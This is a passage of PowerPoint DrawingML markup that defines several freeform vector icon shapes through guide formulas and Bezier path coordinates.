                      <a:pt x="13" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="69"/>
                      <a:pt x="13" y="69"/>
                      <a:pt x="13" y="69"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="102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1" name="Freeform 126">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86A40CC5-0E02-4AF2-A5E2-3B9181F9C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65108" y="1600722"/>
                <a:ext cx="274026" cy="268153"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 82 w 86"/>
                  <a:gd name="T1" fmla="*/ 47 h 84"/>
                  <a:gd name="T2" fmla="*/ 82 w 86"/>
                  <a:gd name="T3" fmla="*/ 42 h 84"/>
                  <a:gd name="T4" fmla="*/ 43 w 86"/>
                  <a:gd name="T5" fmla="*/ 3 h 84"/>
                  <a:gd name="T6" fmla="*/ 36 w 86"/>
                  <a:gd name="T7" fmla="*/ 4 h 84"/>
                  <a:gd name="T8" fmla="*/ 24 w 86"/>
                  <a:gd name="T9" fmla="*/ 0 h 84"/>
                  <a:gd name="T10" fmla="*/ 0 w 86"/>
                  <a:gd name="T11" fmla="*/ 23 h 84"/>
                  <a:gd name="T12" fmla="*/ 4 w 86"/>
                  <a:gd name="T13" fmla="*/ 36 h 84"/>
                  <a:gd name="T14" fmla="*/ 4 w 86"/>
                  <a:gd name="T15" fmla="*/ 42 h 84"/>
                  <a:gd name="T16" fmla="*/ 43 w 86"/>
                  <a:gd name="T17" fmla="*/ 81 h 84"/>
                  <a:gd name="T18" fmla="*/ 50 w 86"/>
                  <a:gd name="T19" fmla="*/ 80 h 84"/>
                  <a:gd name="T20" fmla="*/ 62 w 86"/>
                  <a:gd name="T21" fmla="*/ 84 h 84"/>
                  <a:gd name="T22" fmla="*/ 86 w 86"/>
                  <a:gd name="T23" fmla="*/ 61 h 84"/>
                  <a:gd name="T24" fmla="*/ 82 w 86"/>
                  <a:gd name="T25" fmla="*/ 47 h 84"/>
                  <a:gd name="T26" fmla="*/ 46 w 86"/>
                  <a:gd name="T27" fmla="*/ 71 h 84"/>
                  <a:gd name="T28" fmla="*/ 23 w 86"/>
                  <a:gd name="T29" fmla="*/ 64 h 84"/>
                  <a:gd name="T30" fmla="*/ 24 w 86"/>
                  <a:gd name="T31" fmla="*/ 51 h 84"/>
                  <a:gd name="T32" fmla="*/ 34 w 86"/>
                  <a:gd name="T33" fmla="*/ 59 h 84"/>
                  <a:gd name="T34" fmla="*/ 52 w 86"/>
                  <a:gd name="T35" fmla="*/ 58 h 84"/>
                  <a:gd name="T36" fmla="*/ 41 w 86"/>
                  <a:gd name="T37" fmla="*/ 47 h 84"/>
                  <a:gd name="T38" fmla="*/ 20 w 86"/>
                  <a:gd name="T39" fmla="*/ 30 h 84"/>
                  <a:gd name="T40" fmla="*/ 37 w 86"/>
                  <a:gd name="T41" fmla="*/ 13 h 84"/>
                  <a:gd name="T42" fmla="*/ 61 w 86"/>
                  <a:gd name="T43" fmla="*/ 19 h 84"/>
                  <a:gd name="T44" fmla="*/ 59 w 86"/>
                  <a:gd name="T45" fmla="*/ 31 h 84"/>
                  <a:gd name="T46" fmla="*/ 42 w 86"/>
                  <a:gd name="T47" fmla="*/ 22 h 84"/>
                  <a:gd name="T48" fmla="*/ 38 w 86"/>
                  <a:gd name="T49" fmla="*/ 35 h 84"/>
                  <a:gd name="T50" fmla="*/ 66 w 86"/>
                  <a:gd name="T51" fmla="*/ 49 h 84"/>
                  <a:gd name="T52" fmla="*/ 46 w 86"/>
                  <a:gd name="T53" fmla="*/ 71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6" h="84">
                    <a:moveTo>
                      <a:pt x="82" y="47"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="46"/>
                      <a:pt x="82" y="44"/>
                      <a:pt x="82" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="21"/>
                      <a:pt x="64" y="3"/>
                      <a:pt x="43" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="3"/>
                      <a:pt x="39" y="3"/>
                      <a:pt x="36" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="1"/>
                      <a:pt x="28" y="0"/>
                      <a:pt x="24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28"/>
                      <a:pt x="2" y="32"/>
                      <a:pt x="4" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="38"/>
                      <a:pt x="4" y="40"/>
                      <a:pt x="4" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="64"/>
                      <a:pt x="21" y="81"/>
                      <a:pt x="43" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="81"/>
                      <a:pt x="48" y="81"/>
                      <a:pt x="50" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="83"/>
                      <a:pt x="58" y="84"/>
                      <a:pt x="62" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="84"/>
                      <a:pt x="86" y="73"/>
                      <a:pt x="86" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="56"/>
                      <a:pt x="84" y="51"/>
                      <a:pt x="82" y="47"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="46" y="71"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="71"/>
                      <a:pt x="28" y="69"/>
                      <a:pt x="23" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="58"/>
                      <a:pt x="19" y="52"/>
                      <a:pt x="24" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="51"/>
                      <a:pt x="32" y="57"/>
                      <a:pt x="34" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="60"/>
                      <a:pt x="47" y="64"/>
                      <a:pt x="52" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="51"/>
                      <a:pt x="48" y="48"/>
                      <a:pt x="41" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="46"/>
                      <a:pt x="19" y="40"/>
                      <a:pt x="20" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="19"/>
                      <a:pt x="29" y="14"/>
                      <a:pt x="37" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="12"/>
                      <a:pt x="55" y="15"/>
                      <a:pt x="61" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="25"/>
                      <a:pt x="63" y="31"/>
                      <a:pt x="59" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="55" y="32"/>
                      <a:pt x="51" y="22"/>
                      <a:pt x="42" y="22"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="22"/>
                      <a:pt x="27" y="32"/>
                      <a:pt x="38" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="37"/>
                      <a:pt x="61" y="38"/>
                      <a:pt x="66" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="59"/>
                      <a:pt x="59" y="70"/>
                      <a:pt x="46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2" name="Freeform 127">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A89437E-9DE2-4804-9028-11A3B967D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82548" y="1367799"/>
                <a:ext cx="152672" cy="199648"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 42 w 48"/>
                  <a:gd name="T1" fmla="*/ 8 h 63"/>
                  <a:gd name="T2" fmla="*/ 6 w 48"/>
                  <a:gd name="T3" fmla="*/ 8 h 63"/>
                  <a:gd name="T4" fmla="*/ 0 w 48"/>
                  <a:gd name="T5" fmla="*/ 14 h 63"/>
                  <a:gd name="T6" fmla="*/ 0 w 48"/>
                  <a:gd name="T7" fmla="*/ 16 h 63"/>
                  <a:gd name="T8" fmla="*/ 48 w 48"/>
                  <a:gd name="T9" fmla="*/ 16 h 63"/>
                  <a:gd name="T10" fmla="*/ 48 w 48"/>
                  <a:gd name="T11" fmla="*/ 14 h 63"/>
                  <a:gd name="T12" fmla="*/ 42 w 48"/>
                  <a:gd name="T13" fmla="*/ 8 h 63"/>
                  <a:gd name="T14" fmla="*/ 31 w 48"/>
                  <a:gd name="T15" fmla="*/ 4 h 63"/>
                  <a:gd name="T16" fmla="*/ 32 w 48"/>
                  <a:gd name="T17" fmla="*/ 10 h 63"/>
                  <a:gd name="T18" fmla="*/ 16 w 48"/>
                  <a:gd name="T19" fmla="*/ 10 h 63"/>
                  <a:gd name="T20" fmla="*/ 17 w 48"/>
                  <a:gd name="T21" fmla="*/ 4 h 63"/>
                  <a:gd name="T22" fmla="*/ 31 w 48"/>
                  <a:gd name="T23" fmla="*/ 4 h 63"/>
                  <a:gd name="T24" fmla="*/ 32 w 48"/>
                  <a:gd name="T25" fmla="*/ 0 h 63"/>
                  <a:gd name="T26" fmla="*/ 16 w 48"/>
                  <a:gd name="T27" fmla="*/ 0 h 63"/>
                  <a:gd name="T28" fmla="*/ 13 w 48"/>
                  <a:gd name="T29" fmla="*/ 3 h 63"/>
                  <a:gd name="T30" fmla="*/ 12 w 48"/>
                  <a:gd name="T31" fmla="*/ 11 h 63"/>
                  <a:gd name="T32" fmla="*/ 14 w 48"/>
                  <a:gd name="T33" fmla="*/ 14 h 63"/>
                  <a:gd name="T34" fmla="*/ 34 w 48"/>
                  <a:gd name="T35" fmla="*/ 14 h 63"/>
                  <a:gd name="T36" fmla="*/ 36 w 48"/>
                  <a:gd name="T37" fmla="*/ 11 h 63"/>
                  <a:gd name="T38" fmla="*/ 35 w 48"/>
                  <a:gd name="T39" fmla="*/ 3 h 63"/>
                  <a:gd name="T40" fmla="*/ 32 w 48"/>
                  <a:gd name="T41" fmla="*/ 0 h 63"/>
                  <a:gd name="T42" fmla="*/ 43 w 48"/>
                  <a:gd name="T43" fmla="*/ 20 h 63"/>
                  <a:gd name="T44" fmla="*/ 5 w 48"/>
                  <a:gd name="T45" fmla="*/ 20 h 63"/>
                  <a:gd name="T46" fmla="*/ 2 w 48"/>
                  <a:gd name="T47" fmla="*/ 24 h 63"/>
                  <a:gd name="T48" fmla="*/ 5 w 48"/>
                  <a:gd name="T49" fmla="*/ 59 h 63"/>
                  <a:gd name="T50" fmla="*/ 9 w 48"/>
                  <a:gd name="T51" fmla="*/ 63 h 63"/>
                  <a:gd name="T52" fmla="*/ 39 w 48"/>
                  <a:gd name="T53" fmla="*/ 63 h 63"/>
                  <a:gd name="T54" fmla="*/ 43 w 48"/>
                  <a:gd name="T55" fmla="*/ 59 h 63"/>
                  <a:gd name="T56" fmla="*/ 46 w 48"/>
                  <a:gd name="T57" fmla="*/ 24 h 63"/>
                  <a:gd name="T58" fmla="*/ 43 w 48"/>
                  <a:gd name="T59" fmla="*/ 20 h 63"/>
                  <a:gd name="T60" fmla="*/ 16 w 48"/>
                  <a:gd name="T61" fmla="*/ 55 h 63"/>
                  <a:gd name="T62" fmla="*/ 10 w 48"/>
                  <a:gd name="T63" fmla="*/ 55 h 63"/>
                  <a:gd name="T64" fmla="*/ 8 w 48"/>
                  <a:gd name="T65" fmla="*/ 28 h 63"/>
                  <a:gd name="T66" fmla="*/ 16 w 48"/>
                  <a:gd name="T67" fmla="*/ 28 h 63"/>
                  <a:gd name="T68" fmla="*/ 16 w 48"/>
                  <a:gd name="T69" fmla="*/ 55 h 63"/>
                  <a:gd name="T70" fmla="*/ 28 w 48"/>
                  <a:gd name="T71" fmla="*/ 55 h 63"/>
                  <a:gd name="T72" fmla="*/ 20 w 48"/>
                  <a:gd name="T73" fmla="*/ 55 h 63"/>
                  <a:gd name="T74" fmla="*/ 20 w 48"/>
                  <a:gd name="T75" fmla="*/ 28 h 63"/>
                  <a:gd name="T76" fmla="*/ 28 w 48"/>
                  <a:gd name="T77" fmla="*/ 28 h 63"/>
                  <a:gd name="T78" fmla="*/ 28 w 48"/>
                  <a:gd name="T79" fmla="*/ 55 h 63"/>
                  <a:gd name="T80" fmla="*/ 38 w 48"/>
                  <a:gd name="T81" fmla="*/ 55 h 63"/>
                  <a:gd name="T82" fmla="*/ 32 w 48"/>
                  <a:gd name="T83" fmla="*/ 55 h 63"/>
                  <a:gd name="T84" fmla="*/ 32 w 48"/>
                  <a:gd name="T85" fmla="*/ 28 h 63"/>
                  <a:gd name="T86" fmla="*/ 40 w 48"/>
                  <a:gd name="T87" fmla="*/ 28 h 63"/>
                  <a:gd name="T88" fmla="*/ 38 w 48"/>
                  <a:gd name="T89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8" h="63">
                    <a:moveTo>
                      <a:pt x="42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3" y="8"/>
                      <a:pt x="0" y="11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48" y="14"/>
                      <a:pt x="48" y="14"/>
                      <a:pt x="48" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="11"/>
                      <a:pt x="45" y="8"/>
                      <a:pt x="42" y="8"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="31" y="4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31" y="4"/>
                      <a:pt x="31" y="4"/>
                      <a:pt x="31" y="4"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="32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3" y="1"/>
                      <a:pt x="13" y="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3"/>
                      <a:pt x="13" y="14"/>
                      <a:pt x="14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6" y="14"/>
                      <a:pt x="37" y="13"/>
                      <a:pt x="36" y="11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lose/>
                    <a:moveTo>
                      <a:pt x="43" y="20"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="20"/>
                      <a:pt x="5" y="20"/>
                      <a:pt x="5" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="20"/>
                      <a:pt x="2" y="22"/>
                      <a:pt x="2" y="24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5" y="61"/>
                      <a:pt x="7" y="63"/>
                      <a:pt x="9" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="39" y="63"/>
                      <a:pt x="39" y="63"/>
                      <a:pt x="39" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="63"/>
                      <a:pt x="43" y="61"/>
                      <a:pt x="43" y="59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7" y="22"/>
                      <a:pt x="45" y="20"/>
                      <a:pt x="43" y="20"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="16" y="55"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="55"/>
                      <a:pt x="10" y="55"/>
                      <a:pt x="10" y="55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6" y="28"/>
                      <a:pt x="16" y="28"/>
                      <a:pt x="16" y="28"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="16" y="55"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="28" y="55"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="55"/>
                      <a:pt x="20" y="55"/>
                      <a:pt x="20" y="55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8" y="28"/>
                      <a:pt x="28" y="28"/>
                      <a:pt x="28" y="28"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="28" y="55"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="38" y="55"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="55"/>
                      <a:pt x="32" y="55"/>
                      <a:pt x="32" y="55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40" y="28"/>
                      <a:pt x="40" y="28"/>
                      <a:pt x="40" y="28"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="38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3" name="Freeform 128">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EA1E36D-258D-41A1-B571-38243146CA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4320" y="3002169"/>
                <a:ext cx="416912" cy="418868"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 65 w 130"/>
                  <a:gd name="T1" fmla="*/ 0 h 131"/>
                  <a:gd name="T2" fmla="*/ 0 w 130"/>
                  <a:gd name="T3" fmla="*/ 65 h 131"/>
                  <a:gd name="T4" fmla="*/ 65 w 130"/>
                  <a:gd name="T5" fmla="*/ 131 h 131"/>
                  <a:gd name="T6" fmla="*/ 130 w 130"/>
                  <a:gd name="T7" fmla="*/ 65 h 131"/>
                  <a:gd name="T8" fmla="*/ 65 w 130"/>
                  <a:gd name="T9" fmla="*/ 0 h 131"/>
                  <a:gd name="T10" fmla="*/ 65 w 130"/>
                  <a:gd name="T11" fmla="*/ 114 h 131"/>
                  <a:gd name="T12" fmla="*/ 16 w 130"/>
                  <a:gd name="T13" fmla="*/ 65 h 131"/>
                  <a:gd name="T14" fmla="*/ 65 w 130"/>
                  <a:gd name="T15" fmla="*/ 17 h 131"/>
                  <a:gd name="T16" fmla="*/ 114 w 130"/>
                  <a:gd name="T17" fmla="*/ 65 h 131"/>
                  <a:gd name="T18" fmla="*/ 65 w 130"/>
                  <a:gd name="T19" fmla="*/ 114 h 131"/>
                  <a:gd name="T20" fmla="*/ 40 w 130"/>
                  <a:gd name="T21" fmla="*/ 65 h 131"/>
                  <a:gd name="T22" fmla="*/ 65 w 130"/>
                  <a:gd name="T23" fmla="*/ 90 h 131"/>
                  <a:gd name="T24" fmla="*/ 89 w 130"/>
                  <a:gd name="T25" fmla="*/ 65 h 131"/>
                  <a:gd name="T26" fmla="*/ 65 w 130"/>
                  <a:gd name="T27" fmla="*/ 41 h 131"/>
                  <a:gd name="T28" fmla="*/ 40 w 130"/>
                  <a:gd name="T29" fmla="*/ 6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0" h="131">
                    <a:moveTo>
                      <a:pt x="65" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="0"/>
                      <a:pt x="0" y="29"/>
                      <a:pt x="0" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="101"/>
                      <a:pt x="29" y="131"/>
                      <a:pt x="65" y="131"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="131"/>
                      <a:pt x="130" y="101"/>
                      <a:pt x="130" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="29"/>
                      <a:pt x="101" y="0"/>
                      <a:pt x="65" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="65" y="114"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="114"/>
                      <a:pt x="16" y="92"/>
                      <a:pt x="16" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="38"/>
                      <a:pt x="38" y="17"/>
                      <a:pt x="65" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="17"/>
                      <a:pt x="114" y="38"/>
                      <a:pt x="114" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="92"/>
                      <a:pt x="92" y="114"/>
                      <a:pt x="65" y="114"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="40" y="65"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="79"/>
                      <a:pt x="51" y="90"/>
                      <a:pt x="65" y="90"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="90"/>
                      <a:pt x="89" y="79"/>
                      <a:pt x="89" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="89" y="52"/>
                      <a:pt x="78" y="41"/>
                      <a:pt x="65" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="41"/>
                      <a:pt x="40" y="52"/>
                      <a:pt x="40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4" name="Freeform 129">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48DFA456-39AB-4CC6-A1C5-31FCC84726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30934" y="1252317"/>
                <a:ext cx="690938" cy="299471"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 188 w 216"/>
                  <a:gd name="T1" fmla="*/ 41 h 94"/>
                  <a:gd name="T2" fmla="*/ 178 w 216"/>
                  <a:gd name="T3" fmla="*/ 43 h 94"/>
                  <a:gd name="T4" fmla="*/ 129 w 216"/>
                  <a:gd name="T5" fmla="*/ 0 h 94"/>
                  <a:gd name="T6" fmla="*/ 111 w 216"/>
                  <a:gd name="T7" fmla="*/ 3 h 94"/>
                  <a:gd name="T8" fmla="*/ 108 w 216"/>
                  <a:gd name="T9" fmla="*/ 6 h 94"/>
                  <a:gd name="T10" fmla="*/ 108 w 216"/>
                  <a:gd name="T11" fmla="*/ 91 h 94"/>
                  <a:gd name="T12" fmla="*/ 111 w 216"/>
                  <a:gd name="T13" fmla="*/ 94 h 94"/>
                  <a:gd name="T14" fmla="*/ 188 w 216"/>
                  <a:gd name="T15" fmla="*/ 94 h 94"/>
                  <a:gd name="T16" fmla="*/ 216 w 216"/>
                  <a:gd name="T17" fmla="*/ 68 h 94"/>
                  <a:gd name="T18" fmla="*/ 188 w 216"/>
                  <a:gd name="T19" fmla="*/ 41 h 94"/>
                  <a:gd name="T20" fmla="*/ 85 w 216"/>
                  <a:gd name="T21" fmla="*/ 94 h 94"/>
                  <a:gd name="T22" fmla="*/ 91 w 216"/>
                  <a:gd name="T23" fmla="*/ 94 h 94"/>
                  <a:gd name="T24" fmla="*/ 95 w 216"/>
                  <a:gd name="T25" fmla="*/ 47 h 94"/>
                  <a:gd name="T26" fmla="*/ 91 w 216"/>
                  <a:gd name="T27" fmla="*/ 0 h 94"/>
                  <a:gd name="T28" fmla="*/ 85 w 216"/>
                  <a:gd name="T29" fmla="*/ 0 h 94"/>
                  <a:gd name="T30" fmla="*/ 81 w 216"/>
                  <a:gd name="T31" fmla="*/ 47 h 94"/>
                  <a:gd name="T32" fmla="*/ 85 w 216"/>
                  <a:gd name="T33" fmla="*/ 94 h 94"/>
                  <a:gd name="T34" fmla="*/ 64 w 216"/>
                  <a:gd name="T35" fmla="*/ 94 h 94"/>
                  <a:gd name="T36" fmla="*/ 58 w 216"/>
                  <a:gd name="T37" fmla="*/ 94 h 94"/>
                  <a:gd name="T38" fmla="*/ 54 w 216"/>
                  <a:gd name="T39" fmla="*/ 60 h 94"/>
                  <a:gd name="T40" fmla="*/ 58 w 216"/>
                  <a:gd name="T41" fmla="*/ 27 h 94"/>
                  <a:gd name="T42" fmla="*/ 64 w 216"/>
                  <a:gd name="T43" fmla="*/ 27 h 94"/>
                  <a:gd name="T44" fmla="*/ 68 w 216"/>
                  <a:gd name="T45" fmla="*/ 61 h 94"/>
                  <a:gd name="T46" fmla="*/ 64 w 216"/>
                  <a:gd name="T47" fmla="*/ 94 h 94"/>
                  <a:gd name="T48" fmla="*/ 31 w 216"/>
                  <a:gd name="T49" fmla="*/ 94 h 94"/>
                  <a:gd name="T50" fmla="*/ 37 w 216"/>
                  <a:gd name="T51" fmla="*/ 94 h 94"/>
                  <a:gd name="T52" fmla="*/ 41 w 216"/>
                  <a:gd name="T53" fmla="*/ 67 h 94"/>
                  <a:gd name="T54" fmla="*/ 37 w 216"/>
                  <a:gd name="T55" fmla="*/ 40 h 94"/>
                  <a:gd name="T56" fmla="*/ 31 w 216"/>
                  <a:gd name="T57" fmla="*/ 40 h 94"/>
                  <a:gd name="T58" fmla="*/ 27 w 216"/>
                  <a:gd name="T59" fmla="*/ 67 h 94"/>
                  <a:gd name="T60" fmla="*/ 31 w 216"/>
                  <a:gd name="T61" fmla="*/ 94 h 94"/>
                  <a:gd name="T62" fmla="*/ 4 w 216"/>
                  <a:gd name="T63" fmla="*/ 81 h 94"/>
                  <a:gd name="T64" fmla="*/ 10 w 216"/>
                  <a:gd name="T65" fmla="*/ 81 h 94"/>
                  <a:gd name="T66" fmla="*/ 14 w 216"/>
                  <a:gd name="T67" fmla="*/ 67 h 94"/>
                  <a:gd name="T68" fmla="*/ 10 w 216"/>
                  <a:gd name="T69" fmla="*/ 54 h 94"/>
                  <a:gd name="T70" fmla="*/ 4 w 216"/>
                  <a:gd name="T71" fmla="*/ 54 h 94"/>
                  <a:gd name="T72" fmla="*/ 0 w 216"/>
                  <a:gd name="T73" fmla="*/ 67 h 94"/>
                  <a:gd name="T74" fmla="*/ 4 w 216"/>
                  <a:gd name="T75" fmla="*/ 81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6" h="94">
                    <a:moveTo>
                      <a:pt x="188" y="41"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="184" y="41"/>
                      <a:pt x="181" y="42"/>
                      <a:pt x="178" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="175" y="19"/>
                      <a:pt x="154" y="0"/>
                      <a:pt x="129" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="0"/>
                      <a:pt x="116" y="1"/>
                      <a:pt x="111" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="109" y="4"/>
                      <a:pt x="108" y="5"/>
                      <a:pt x="108" y="6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3"/>
                      <a:pt x="110" y="94"/>
                      <a:pt x="111" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="111" y="94"/>
                      <a:pt x="188" y="94"/>
                      <a:pt x="188" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="204" y="94"/>
                      <a:pt x="216" y="82"/>
                      <a:pt x="216" y="68"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="216" y="53"/>
                      <a:pt x="204" y="41"/>
                      <a:pt x="188" y="41"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="85" y="94"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="94"/>
                      <a:pt x="91" y="94"/>
                      <a:pt x="91" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="47"/>
                      <a:pt x="95" y="47"/>
                      <a:pt x="95" y="47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1" y="47"/>
                      <a:pt x="81" y="47"/>
                      <a:pt x="81" y="47"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="85" y="94"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="64" y="94"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="94"/>
                      <a:pt x="58" y="94"/>
                      <a:pt x="58" y="9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8" y="27"/>
                      <a:pt x="58" y="27"/>
                      <a:pt x="58" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="27"/>
                      <a:pt x="64" y="27"/>
                      <a:pt x="64" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="61"/>
                      <a:pt x="68" y="61"/>
                      <a:pt x="68" y="61"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="64" y="94"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="31" y="94"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="94"/>
                      <a:pt x="37" y="94"/>
                      <a:pt x="37" y="94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37" y="40"/>
                      <a:pt x="37" y="40"/>
                      <a:pt x="37" y="4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27" y="67"/>
                      <a:pt x="27" y="67"/>
                      <a:pt x="27" y="67"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="31" y="94"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="4" y="81"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="81"/>
                      <a:pt x="10" y="81"/>
                      <a:pt x="10" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="67"/>
                      <a:pt x="14" y="67"/>
                      <a:pt x="14" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="54"/>
                      <a:pt x="10" y="54"/>
                      <a:pt x="10" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="54"/>
                      <a:pt x="4" y="54"/>
                      <a:pt x="4" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="67"/>
                      <a:pt x="0" y="67"/>
                      <a:pt x="0" y="67"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="4" y="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5" name="Freeform 130">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA4B53A7-847F-49A5-B4E4-F1CA57D609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2075" y="1610508"/>
